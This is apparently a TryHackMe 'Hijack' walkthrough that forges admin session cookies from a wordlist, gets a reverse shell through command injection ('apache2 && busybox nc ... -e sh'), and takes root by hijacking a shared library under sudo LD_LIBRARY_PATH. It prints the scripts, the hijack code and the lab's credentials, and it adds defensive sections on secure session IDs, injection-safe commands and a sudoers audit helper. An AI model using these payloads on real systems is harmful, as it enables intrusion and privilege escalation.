Hijack | TryHackMe WalkThrough
Running Nmap —
Findings —
Open Ports: 21, 22, 80, 111, 2049, 41591, 42689, 43971, 57924
Mounting the NFS on to the local machine —
Findings —
/mnt/share can be mounted onto the local machine
Note: A new user will be created with useradd. Do this inside a VM so the main OS is not polluted.
Changing the user ID
Extracting the credentials from the file share after switching to the new user —
Findings —
User: ftpuser
Password: W3stV1rg1n14M0un741nM4m4
Extracting files from the FTP file server —
Findings —
- Note from the admin
- Password list
- The user admin uses a password from the list of passwords
Visiting the website hosted on port 80 —
Signing up to test the functionality of the website —
Username: alan
Password: alanalan
Logging in and capturing a request to the URL http://10.10.135.237/index.php —
Visiting the administrator directory —
Findings —
PHPSESSID — YWxhbjo2YTc5MDJlMjMyOGE4MTlkYjVjNWRjZTM2MzExZGM2NA%3D%3D
Content-Length of a Denied Response: 51
Inspecting the session ID —
Findings —
- The session ID is base64 encoded
- Decoding it with the From Base64 operation in CyberChef gives the output
- alan:6a7902e2328a819db5c5dce36311dc64
- Looking up 6a7902e2328a819db5c5dce36311dc64 on crackstation.net shows it is the MD5 hash of the password alanalan
- So the PHPSESSID is base64(username:md5(password))
- Since the admin uses a password from the given wordlist, a session ID can be constructed for each candidate password and used to hijack the admin's account
Brute forcing the login form is not feasible since a rate limiter is in place —
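The weakness above is that the session identifier is derived from the credentials, so anyone who knows the format and can guess the password can mint a valid session without touching the rate-limited login form. The following added example (not part of the original walkthrough) decodes a PHPSESSID of that shape to flag the weak construction, and shows the server-side alternative: an unguessable random identifier that is mapped to the user in server storage. It uses the alan cookie from the page as its sample input; the function names are my own.

```python
import base64
import binascii
import re
import secrets
from urllib.parse import unquote

# Session cookie captured on the page for the non-admin test account (URL-encoded).
SAMPLE_COOKIE = "YWxhbjo2YTc5MDJlMjMyOGE4MTlkYjVjNWRjZTM2MzExZGM2NA%3D%3D"

MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$")


def decode_phpsessid(cookie):
    """Return (username, digest) if the cookie is base64("user:<32 hex chars>"), else None."""
    try:
        raw = base64.b64decode(unquote(cookie), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    user, sep, digest = raw.partition(":")
    if not sep or not user or not MD5_HEX_RE.match(digest):
        return None
    return user, digest


def is_weak_session_id(cookie):
    """A session id is weak when its value can be computed from the credentials.

    Knowing the token format turns a password guess into a ready-made session,
    so the login rate limiter protects nothing.
    """
    return decode_phpsessid(cookie) is not None


def issue_session_id():
    """Server-side replacement: 256 bits from the OS CSPRNG, stored against the
    user in a server-side session table; the cookie itself carries no meaning."""
    return secrets.token_urlsafe(32)
```

The random identifier never decodes to a `user:digest` pair (its URL-safe alphabet and 43-character length fail strict base64 validation), which is exactly why `is_weak_session_id` reports it as sound.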
Creating a Python script to access the administrator panel via session hijacking —
import hashlib
import base64
import requests

URL = "http://10.10.135.237/administration.php"

# Candidate admin passwords recovered from the FTP server
with open("/home/thm/hijack/.passwords_list.txt", 'r') as _f:
    data = [x.strip() for x in _f.readlines()]

# Baseline request without a session; the denied page is 51 bytes long
r = requests.get(URL)
print(r)

for line in data:
    # Rebuild the cookie format: base64(admin:md5(password))
    _hash = hashlib.md5(line.encode('utf-8')).hexdigest().encode('utf-8')
    concat_str = b'admin:' + _hash
    _b64hash = base64.b64encode(concat_str).decode()
    print(_b64hash)
    headers = {"Cookie": f"PHPSESSID={_b64hash}"}
    r = requests.get(URL, headers=headers)
    # Anything longer than the 51-byte denied response means the panel rendered
    if len(r.text) > 51:
        print("password: " + line)
        print("cookie: " + _b64hash)
        break
Note — Change the IP address and the path to the password file if needed
Script
Execution
Findings —
Admin —
- SESSID: YWRtaW46ZDY1NzNlZDczOWFlN2ZkZmIzY2VkMTk3ZDk0ODIwYTU%3D
- Password: uDh3jCQsdcuLhjVkAy5x
Note: The administrator panel can be reached either by hijacking the session (manipulating the request in Burp Suite) or simply by logging in with the acquired credentials
Step 1 - Visit the administrator panel
Step 2 - Capture the request in Burp, modify the session ID and forward it
Gained access to the admin panel —
Note: If the session is not stable, just log in as admin
Command Injection Vulnerability in the admin panel — Gaining initial access —
- Using apache2 as the service whose status is checked
- Using the && operator to chain the reverse shell command after it and gain initial access
Payload: apache2 && busybox nc 10.11.50.160 9001 -e sh
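The panel's status check is vulnerable because the service name is spliced into a shell command line, so a shell operator in the input starts a second command running as www-data. The added example below (my own code, not the box's PHP) shows that pattern next to its hardened form: an allow-list plus a strict name pattern, and the command executed as an argv list with no shell. The allow-list contents and the `looks_like_injection` log helper are constructed for the demo.

```python
import re
import subprocess

# Constructed allow-list of the services the status page is meant to query.
ALLOWED_SERVICES = {"apache2", "ssh", "nfs-kernel-server", "vsftpd"}
# Unit names only: no whitespace and no shell metacharacters.
SERVICE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.@-]{0,63}$")
# Operators that would let the input start a second command in a shell.
SHELL_META_RE = re.compile(r"[;&|`$<>\n]")


def build_status_command_unsafe(service):
    """The vulnerable pattern: untrusted input becomes part of a shell string.

    With "apache2 && id" the shell runs `service apache2 status` and then `id`,
    which is the class of flaw the admin panel above has.
    """
    return f"service {service} status"


def validate_service_name(service):
    """True only for names that match the strict pattern AND are on the allow-list."""
    return bool(SERVICE_NAME_RE.match(service)) and service in ALLOWED_SERVICES


def build_status_command_safe(service):
    """Hardened form: validated value passed as a separate argv element, never via a shell."""
    if not validate_service_name(service):
        raise ValueError(f"service not permitted: {service!r}")
    return ["service", service, "status"]


def service_status(service, timeout=10):
    """Run the hardened command and return (returncode, stdout)."""
    proc = subprocess.run(
        build_status_command_safe(service),
        capture_output=True, text=True, timeout=timeout,
    )
    return proc.returncode, proc.stdout


def looks_like_injection(value):
    """Detection helper for request logs: flag a service parameter carrying shell operators."""
    return bool(SHELL_META_RE.search(value))
```

Even with `shell=False`, the allow-list matters: without it a user could still query arbitrary units, and a name such as `-h` could be parsed as an option by the invoked program.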
Lateral Movement From www-data to rick due to information disclosure from the config.php file in the /var/www/data folder —
Gaining access as the user rick and capturing the user.txt flag —
LD_LIBRARY_PATH and apache2 privilege escalation vector found —
Source — https://atom.hackstreetboys.ph/linux-privilege-escalation-environment-variables/
- LD_LIBRARY_PATH holds a list of directories that the dynamic linker searches for shared libraries before the default locations
- Running ldd /usr/sbin/apache2 prints the shared libraries the apache2 binary loads
- Pick one of the shared objects in the list and hijack it by placing a file with the same name in a directory we control. For this demonstration the target is libcrypt.so.1
Creating a shared library-
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Constructor runs automatically when the loader maps this library */
static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH"); /* stop the child shell loading this library again */
    setreuid(0,0);               /* apache2 runs as root via sudo, so become root */
    system("/bin/bash -p");
}
Compiling the C binary-
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/rick/library_path.c
Executing the exploit to gain root access-
sudo LD_LIBRARY_PATH=/tmp /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
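This escalation only works because sudo accepted a caller-supplied LD_LIBRARY_PATH. With the default env_reset, sudo strips LD_* variables; the sudoers manual allows them through when the Defaults setenv option is on, when the rule carries the SETENV tag, or when the matched command is ALL, and an env_keep entry for an LD_* variable has the same effect. The added example below (my own audit helper, not from the page or the box) scans a sudoers file for those conditions. The sudoers excerpt it runs on is constructed for the demo and is not the machine's real file.

```python
import re

# Constructed sudoers excerpt for the demo (not the target's configuration).
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        env_keep += "LD_LIBRARY_PATH"
root    ALL=(ALL:ALL) ALL
rick    ALL=(root) NOPASSWD: SETENV: /usr/sbin/apache2
alan    ALL=(ALL) /usr/bin/less
"""


def audit_sudoers(text):
    """Return (line_number, reason) pairs for rules that let a caller control LD_* variables."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and #include lines
        if not line or line.startswith(("User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
            continue
        if line.startswith("Defaults"):
            body = line[len("Defaults"):].strip()
            if re.search(r"\benv_(keep|check)\b.*\bLD_", body):
                findings.append((lineno, "env_keep/env_check preserves an LD_* variable"))
            elif re.fullmatch(r"setenv", body) or re.fullmatch(r"!env_reset", body):
                findings.append((lineno, "sudo will accept caller-supplied environment variables"))
            continue
        if "=" not in line:
            continue
        # user host=(runas) TAG: TAG: command ...
        spec = line.split("=", 1)[1]
        spec = re.sub(r"\([^)]*\)", "", spec)  # remove the (runas) list
        tokens = spec.split()
        tags = [t for t in tokens if t.endswith(":")]
        commands = [t for t in tokens if not t.endswith(":")]
        if "SETENV:" in tags:
            findings.append((lineno, "SETENV tag lets the caller pass LD_LIBRARY_PATH on the command line"))
        elif commands == ["ALL"]:
            findings.append((lineno, "command ALL implicitly permits caller-supplied environment variables"))
    return findings


if __name__ == "__main__":
    for lineno, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {lineno}: {reason}")
```

The fix for the rick rule is to drop the SETENV tag (and to avoid granting root execution of a binary that honours loader variables at all); the env_keep line should simply be removed, since env_reset already does the right thing.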